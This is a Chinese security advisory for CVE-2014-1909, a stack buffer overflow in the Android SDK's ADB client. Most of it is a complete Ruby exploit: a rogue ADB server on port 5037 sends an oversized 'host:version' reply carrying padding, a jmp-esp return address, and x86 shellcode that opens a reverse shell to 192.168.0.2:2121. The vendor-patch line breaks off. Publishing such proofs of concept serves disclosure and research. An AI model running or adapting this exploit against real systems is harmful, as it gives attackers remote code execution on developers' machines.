发布日期:2014-02-04
更新日期:2014-02-15
受影响系统:
Android SDK
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65403
CVE(CAN) ID: CVE-2014-1909
Android SDK Platform Tool是Android设备的开发软件包。
Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。
<*来源:Joshua J. Drake
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'socket'
require 'uri'
puts "[*] Exploit for ADB client stack buffer overflow -jduck"
# linux/x86/shell_reverse_tcp - 90 bytes
#
# VERBOSE=false, LHOST=192.168.0.2, LPORT=2121,
# ReverseConnectRetries=5, ReverseAllowProxy=false,
# PrependFork=true, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=true, InitialAutoRunScript=, AutoRunScript=
payload =
"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd" +
"\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" +
"\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8" +
"\x00\x02\x68\x02\x00\x08\x49\x89\xe1\xb0\x66\x50\x51\x53" +
"\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f" +
"\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31" +
"\xdb\x6a\x01\x58\xcd\x80"
def read_request(cli)
len = cli.recv(4)
len = len.to_i(16)
puts "[*] request length: #{len}"
buf = cli.recv(len)
puts "[*] request: #{buf.inspect}"
buf
end
srv = TCPServer.new 5037
loop {
puts "[*] Waiting for client..."
cli = srv.accept
puts "[*] Accepted client"
req = read_request(cli)
if req != "host:version"
puts "[-] incorrect request!"
next
end
res = "OKAY"
res << "-fff"
res << ("A" * 112) # padding
# popped registers
res << [
0xc0c00004, # ebx
0xc0c00008, # esi
0xc0c0000c, # edi
0xc0c00010, # ebp
#0x0810efd3, # eip - int 3 / ret
0x812a14b, # eip - jmp esp
].pack('V*')
res << payload
puts "[*] Sending response (0x%x bytes)" % res.length
cli.write(res)
cli.close
}
srv.close
建议:
--------------------------------------------------------------------------------
厂商补丁:
Android
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: